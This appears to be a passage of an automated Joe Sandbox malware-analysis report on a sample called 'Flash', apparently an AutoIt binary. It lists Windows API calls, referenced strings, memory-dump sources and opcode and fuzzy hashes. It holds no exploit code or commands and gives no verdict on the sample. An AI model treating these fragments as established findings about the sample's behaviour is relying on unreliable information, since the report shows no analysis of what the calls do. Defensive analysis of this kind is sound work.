                                                        • GetWindowRect.USER32(00000000,?), ref: 00A57296
                                                        • GetSysColor.USER32(00000012), ref: 00A572B0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                        • String ID: static
                                                        • API String ID: 1983116058-2160076837
                                                        • Opcode ID: 8f23888dd0c34f03d18776d3a5f8897ddad7fa4a8e43ef9d39bb8d3e7d9600f4
                                                        • Instruction ID: 4b3b1cc6ae6ad6e4cc560a853ac28b92daf236859f0ff4978f4d725492901af2
                                                        • Opcode Fuzzy Hash: 8f23888dd0c34f03d18776d3a5f8897ddad7fa4a8e43ef9d39bb8d3e7d9600f4
                                                        • Instruction Fuzzy Hash: BA21447261420AAFDB04DFA8DC46EFE7BB8FB08305F004619FD55E3241E675A8919B60
                                                        APIs
                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00A56FC7
                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A56FD6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: LengthMessageSendTextWindow
                                                        • String ID: edit
                                                        • API String ID: 2978978980-2167791130
                                                        • Opcode ID: 8f6dfb370e04388a28df97c3bf43abb63032e8c116585432e9e22899ed5d28e5
                                                        • Instruction ID: f96c5d79923ff6aa3de49c9cbe814538d1978ae3cb44dd21615acb7757c8ca16
                                                        • Opcode Fuzzy Hash: 8f6dfb370e04388a28df97c3bf43abb63032e8c116585432e9e22899ed5d28e5
                                                        • Instruction Fuzzy Hash: 2A116A71904208ABEB518FA4EC80EEB3B6AFB14369F904714FD65931E0C771DC999B60
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A331C9
                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00A331E8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: a6c011647c3f4690fb9829a562e42716c39874fe8b36ca01749b905d344e2b4f
                                                        • Instruction ID: 771d5fb1701837bb8a0a43c4223901cf7f10f71634a71eda11bc7a84455e38ee
                                                        • Opcode Fuzzy Hash: a6c011647c3f4690fb9829a562e42716c39874fe8b36ca01749b905d344e2b4f
                                                        • Instruction Fuzzy Hash: D8110433A18114ABDF20DB98DC45BAEB7B8AB05710F144323F806A72A0D770EF05CB91
                                                        APIs
                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A428F8
                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A42921
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Internet$OpenOption
                                                        • String ID: <local>
                                                        • API String ID: 942729171-4266983199
                                                        • Opcode ID: 532a00d93ae413628032290e127449325ed50d9d9df637f35dc8fef6fcb18e6e
                                                        • Instruction ID: 8ac7f69934d6a5c70b7e5899d9b85c3b880ee16a591a8acfb8ecfe3095eb035a
                                                        • Opcode Fuzzy Hash: 532a00d93ae413628032290e127449325ed50d9d9df637f35dc8fef6fcb18e6e
                                                        • Instruction Fuzzy Hash: 4911E078501225BAEB248F518C88FFBFBACFF45351F50852AF50582000E3B06890D7F0
                                                        APIs
                                                          • Part of subcall function 00A486E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00A4849D,?,00000000,?,?), ref: 00A486F7
                                                        • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00A484A0
                                                        • htons.WSOCK32(00000000,?,00000000), ref: 00A484DD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWidehtonsinet_addr
                                                        • String ID: 255.255.255.255
                                                        • API String ID: 2496851823-2422070025
                                                        • Opcode ID: e87d59c067f4ccd85772aea0bedb6c1bb33c2dbd6d4e319aed6bb3dd6b337ed4
                                                        • Instruction ID: 91496a6e08348eae318f2f3d6397d516f9d1f5833044d00698a8b951573aae71
                                                        • Opcode Fuzzy Hash: e87d59c067f4ccd85772aea0bedb6c1bb33c2dbd6d4e319aed6bb3dd6b337ed4
                                                        • Instruction Fuzzy Hash: 6D11C43920021AABDB10EF64EC46FBEB334FF44320F10856AFA15972D1DB71A810C795
                                                        APIs
                                                          • Part of subcall function 009E1A36: _memmove.LIBCMT ref: 009E1A77
                                                          • Part of subcall function 00A2B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00A2B7BD
                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00A29A2B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        • Opcode ID: e4dd9c5efdb2a131c41132de750073dd6d46472a9156c85c1ef9cf0ddbce1fd1
                                                        • Instruction ID: c80e0e18d1eb73fdb238672c7256eb820fdc52ea2df0e03d969a9c21570a630d
                                                        • Opcode Fuzzy Hash: e4dd9c5efdb2a131c41132de750073dd6d46472a9156c85c1ef9cf0ddbce1fd1
                                                        • Instruction Fuzzy Hash: D901F571A42224AB8B14EBA8CD52DFF7369AF52360F100A29F871932D1DA305C488660
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock_memmove
                                                        • String ID: EA06
                                                        • API String ID: 1988441806-3962188686
                                                        • Opcode ID: 2888a63af5caaf7dcf3c1e9e4de81c21597820c23d91385bb760cc5164627022
                                                        • Instruction ID: 47676a743dd6cd5c3695a44d6e4cccd551c6761cb4b4162c702ca8b371160d61
                                                        • Opcode Fuzzy Hash: 2888a63af5caaf7dcf3c1e9e4de81c21597820c23d91385bb760cc5164627022
                                                        • Instruction Fuzzy Hash: F301B972904258BEDB18C7A8C856FFE7BF89B15301F04459EF652D6181E5B5A6088760
                                                        APIs
                                                          • Part of subcall function 009E1A36: _memmove.LIBCMT ref: 009E1A77
                                                          • Part of subcall function 00A2B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00A2B7BD
                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00A29923
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        • Opcode ID: b951985107c6563dedbf4df2ab6e3f4d9bf18ea785cea06212fc311f6938dcf0
                                                        • Instruction ID: e4943a3bfc04313e244128c5368d41bc6c951f5c22acfda6c659116390b30f0d
                                                        • Opcode Fuzzy Hash: b951985107c6563dedbf4df2ab6e3f4d9bf18ea785cea06212fc311f6938dcf0
                                                        • Instruction Fuzzy Hash: 85012B71E421147FCB14FBA4DA52FFF73BC9F51700F100039B851A3291DA205E4896B1
                                                        APIs
                                                          • Part of subcall function 009E1A36: _memmove.LIBCMT ref: 009E1A77
                                                          • Part of subcall function 00A2B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00A2B7BD
                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00A299A6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        • Opcode ID: 611fa8e9cc5f47015a749ab4e4fae1a87339f79b605cae382b2bf98a403e00ef
                                                        • Instruction ID: d5e13bae3ed4d7b5b7ea04f0989cc3ff5e11c27b2a7c2a9b6162504f3ada452a
                                                        • Opcode Fuzzy Hash: 611fa8e9cc5f47015a749ab4e4fae1a87339f79b605cae382b2bf98a403e00ef
                                                        • Instruction Fuzzy Hash: 4D0126B2A421187BCB15EBA8DB12FFF73AD9F11750F100039B851A3292DA244E4896B1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp
                                                        • String ID: #32770
                                                        • API String ID: 2292705959-463685578
                                                        • Opcode ID: 69b6e481a48073ee108630c8e9ef0fc4540cdcce328034962a74ad22b2459939
                                                        • Instruction ID: eb7d337fd7e3b8fbf4daf5d95e96c01830dff4972249b0420e293cd7aa8c9115
                                                        • Opcode Fuzzy Hash: 69b6e481a48073ee108630c8e9ef0fc4540cdcce328034962a74ad22b2459939
                                                        • Instruction Fuzzy Hash: 12E09B7260022927D710E699AC45FA7F7ACEB55761F000057F904D6051E960A94587E0
                                                        APIs
                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00A288A0
                                                          • Part of subcall function 009F3588: _doexit.LIBCMT ref: 009F3592
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Message_doexit
                                                        • String ID: AutoIt$Error allocating memory.
                                                        • API String ID: 1993061046-4017498283
                                                        • Opcode ID: a2876f403c66816f33c445e83147d853a1aa9f9f0e48d0b68770b1bf20a85287
                                                        • Instruction ID: 14a7bbe5bd6343fa555b5290f30e05bdc09b5c368a8c1d0bbba0a5b92149af7a
                                                        • Opcode Fuzzy Hash: a2876f403c66816f33c445e83147d853a1aa9f9f0e48d0b68770b1bf20a85287
                                                        • Instruction Fuzzy Hash: 7DD05B7238535C32D21577E96C0BFDA7A488B45B51F044426FB08651D38ED599E143D5
                                                        APIs
                                                          • Part of subcall function 00A0B544: _memset.LIBCMT ref: 00A0B551
                                                          • Part of subcall function 009F0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A0B520,?,?,?,009D100A), ref: 009F0B79
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,009D100A), ref: 00A0B524
                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,009D100A), ref: 00A0B533
                                                        Strings
                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A0B52E
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                        • API String ID: 3158253471-631824599
                                                        • Opcode ID: ded29c0ec92347b62102c5d67314685579ac2419999dd4374509c04ef69d804c
                                                        • Instruction ID: e08d3d32c378e008be26897233c887901a0611f40ea864de8a02add540f243ac
                                                        • Opcode Fuzzy Hash: ded29c0ec92347b62102c5d67314685579ac2419999dd4374509c04ef69d804c
                                                        • Instruction Fuzzy Hash: D3E06D702503158FD730DF79EA08B867AE4AF04705F00C95EE456C6381DBB4E544CBA1
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00A10091
                                                          • Part of subcall function 00A4C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00A1027A,?), ref: 00A4C6E7
                                                          • Part of subcall function 00A4C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00A4C6F9
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00A10289
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                        • String ID: WIN_XPe
                                                        • API String ID: 582185067-3257408948
                                                        • Opcode ID: 4417d0a1f4dec466da22749d8625fcdcb3d34a731acb52591fa83a1f4279f6af
                                                        • Instruction ID: 586efa66deecd240d77cd234265525ee7be9b87e10868127bce19aaec0da3992
                                                        • Opcode Fuzzy Hash: 4417d0a1f4dec466da22749d8625fcdcb3d34a731acb52591fa83a1f4279f6af
                                                        • Instruction Fuzzy Hash: 91F0C971845109DFCB55DBA0C998FEDBBB8AF4C300F245486E14AA2190CBB54FC5DF21